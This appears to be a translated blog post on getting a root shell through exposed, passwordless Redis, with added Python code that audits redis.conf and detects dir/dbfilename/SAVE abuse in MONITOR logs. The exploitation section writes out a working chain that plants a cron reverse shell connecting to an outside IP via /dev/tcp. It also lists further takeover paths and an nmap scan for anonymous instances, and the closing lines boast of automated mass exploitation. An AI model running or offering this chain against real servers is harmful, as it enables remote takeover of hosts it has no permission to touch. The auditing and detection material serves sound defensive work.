Background
A default Redis installation accepts connections only from the local machine and has no password.
Because most company applications need several servers to reach Redis, operations staff commonly change the bind directive in /etc/redis.conf to 0.0.0.0, which leaves the instance reachable from the internet with anonymous (unauthenticated) access.
An externally reachable Redis leaks its data, but on its own that does not give direct code execution.
If Redis is started as root, however, it can be turned into a shell.
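The two conditions the post describes (anonymous remote access plus a CONFIG command that can move the dump file anywhere) are both visible in redis.conf before anyone connects. The following auditor is an added example and not code from the original post: it parses a redis.conf-style text and reports the settings that enable the technique, with an exposed sample and a hardened sample embedded as constructed input. The runs_as_root flag is an assumption supplied by the caller, since the config file does not record which user the service runs as.

```python
import re

# Constructed sample configs (not taken from the post or any real host):
# the exposed layout the post describes, and a hardened counterpart.
EXPOSED_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

def parse_conf(text):
    """Return a list of (directive, [args]) pairs from redis.conf-style text."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        entries.append((parts[0].lower(), parts[1:]))
    return entries

def audit_conf(text, runs_as_root=False):
    """Return findings for the weaknesses the cron-write technique relies on."""
    directives = {}
    renamed = set()
    for name, args in parse_conf(text):
        if name == "rename-command" and len(args) == 2:
            # rename-command CONFIG "" disables CONFIG entirely; a random name hides it
            renamed.add(args[0].upper())
        else:
            directives[name] = args  # last occurrence wins, as in Redis itself

    findings = []
    bind = directives.get("bind", [])
    if not bind or "0.0.0.0" in bind or "*" in bind or "::" in bind:
        findings.append("bind: socket listens on all interfaces (anonymous remote access)")
    if not directives.get("requirepass"):
        findings.append("requirepass: no password set")
    if directives.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed/disabled: any client can change dir and dbfilename")
    if runs_as_root:
        findings.append("process runs as root: a dump file can land in /var/spool/cron or ~/.ssh")
    return findings

if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_conf(conf, runs_as_root=(label == "exposed")))
```

The hardened sample keeps the bind on loopback, sets a password, and disables CONFIG and FLUSHALL by renaming them; on Redis 6 and later, ACL users with restricted command sets are the preferred replacement for rename-command, and a non-root service user removes the cron and authorized_keys write paths regardless of what a client can do.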
How it is exploited
Through the Redis CONFIG command you can write to an arbitrary file; with enough permissions, writing a cron job that spawns a reverse shell is enough to get a shell.
# connect to the Redis server
redis-cli -h your_redis_server
# keep the written file clean by erasing the existing data (not recommended if it is someone else's machine)
# flushall
# set key 0 to a bash reverse-shell cron entry that runs every minute and connects back to port 7890 on your own server (nc -vvl 7890)
set 0 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/103.21.140.84/7890 0>&1\n\n"
# set where to save
config set dir /var/spool/cron/
# set the file name to save as
config set dbfilename root
# save
save
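The command sequence above leaves a distinctive trace on the server side: a client changes dir and dbfilename and then forces a SAVE, often after a FLUSHALL. The detector below is an added example, not part of the original post, that runs over Redis MONITOR-style lines (timestamp, [db client:port], quoted command and arguments) and correlates those steps per client. The lines in SAMPLE_MONITOR are constructed for the example and are not a real capture; the list of sensitive directories is an assumption you would tune to your own hosts.

```python
import re
import shlex

# Constructed MONITOR output, not captured from any real host. The key value that
# would hold the cron entry is replaced by a placeholder; the detector does not
# depend on it.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.7:51000] "GET" "session:abc"
1700000001.200000 [0 198.51.100.23:40212] "FLUSHALL"
1700000002.300000 [0 198.51.100.23:40212] "SET" "0" "<cron entry omitted>"
1700000003.400000 [0 198.51.100.23:40212] "CONFIG" "SET" "dir" "/var/spool/cron/"
1700000004.500000 [0 198.51.100.23:40212] "CONFIG" "SET" "dbfilename" "root"
1700000005.600000 [0 198.51.100.23:40212] "SAVE"
1700000006.700000 [0 10.0.0.7:51000] "CONFIG" "GET" "maxmemory"
"""

# Assumed set of directories where a dump file becomes executable config or
# credentials (cron, ssh keys, login scripts, web roots).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/etc/profile.d",
                  "/root", "/home", "/var/www", "/etc")

MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')

def parse_monitor_line(line):
    """Split one MONITOR line into ts, db, client and argv; None if malformed."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    ts, db, client, rest = m.groups()
    return {"ts": float(ts), "db": int(db), "client": client,
            "args": shlex.split(rest)}

def detect_rdb_write_abuse(monitor_text):
    """Return (client, severity, message) alerts for dir/dbfilename/SAVE chains."""
    state = {}   # client -> {"dir": ..., "dbfilename": ...} seen so far
    alerts = []
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        cmd, client = ev["args"][0].upper(), ev["client"]
        st = state.setdefault(client, {})
        if cmd == "CONFIG" and len(ev["args"]) >= 4 and ev["args"][1].upper() == "SET":
            key, val = ev["args"][2].lower(), ev["args"][3]
            if key == "dir" and val.startswith(SENSITIVE_DIRS):
                st["dir"] = val
                alerts.append((client, "medium", f"CONFIG SET dir to sensitive path {val}"))
            elif key == "dbfilename" and not val.endswith(".rdb"):
                st["dbfilename"] = val
                alerts.append((client, "medium", f"CONFIG SET dbfilename to non-rdb name {val}"))
        elif cmd in ("SAVE", "BGSAVE") and st:
            # The dump is now written where the client pointed it: escalate.
            target = f"{st.get('dir', '<unchanged>')}/{st.get('dbfilename', '<unchanged>')}"
            alerts.append((client, "high", f"{cmd} after dir/dbfilename change: dump written to {target}"))
        elif cmd == "FLUSHALL":
            alerts.append((client, "low", "FLUSHALL (often precedes a clean dump write)"))
    return alerts

if __name__ == "__main__":
    for client, severity, msg in detect_rdb_write_abuse(SAMPLE_MONITOR):
        print(f"[{severity}] {client}: {msg}")
```

MONITOR itself costs throughput on a busy instance, so in production the same rules are better fed from a network tap or proxy in front of Redis, or from the ACL LOG on Redis 6 and later once CONFIG is restricted; the state machine is the same either way, and the high-severity SAVE alert is the one worth paging on.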
Other exploitation techniques
Besides writing a cron job directly to get a shell, there are several other approaches:
Write a cron entry that spawns a reverse shell
Write ~/.ssh/authorized_keys and log in directly with the key
Find the absolute path of the web directory and write a web shell into it
Write an initialization script into /etc/profile.d/
Abuse master-slave (replication) mode
Finding anonymous Redis instances inside the enterprise network
Scan the network segment with nmap for Redis services that allow anonymous access (this works for external ranges too, of course):
$ nmap -p6379 10.11.0.0/16 --script redis-info
Yes, that's the hole. It moved me forward 10 pages in the WooYun ranking in 10 days; with the exploitation automated, all you need to do is check the reports every day.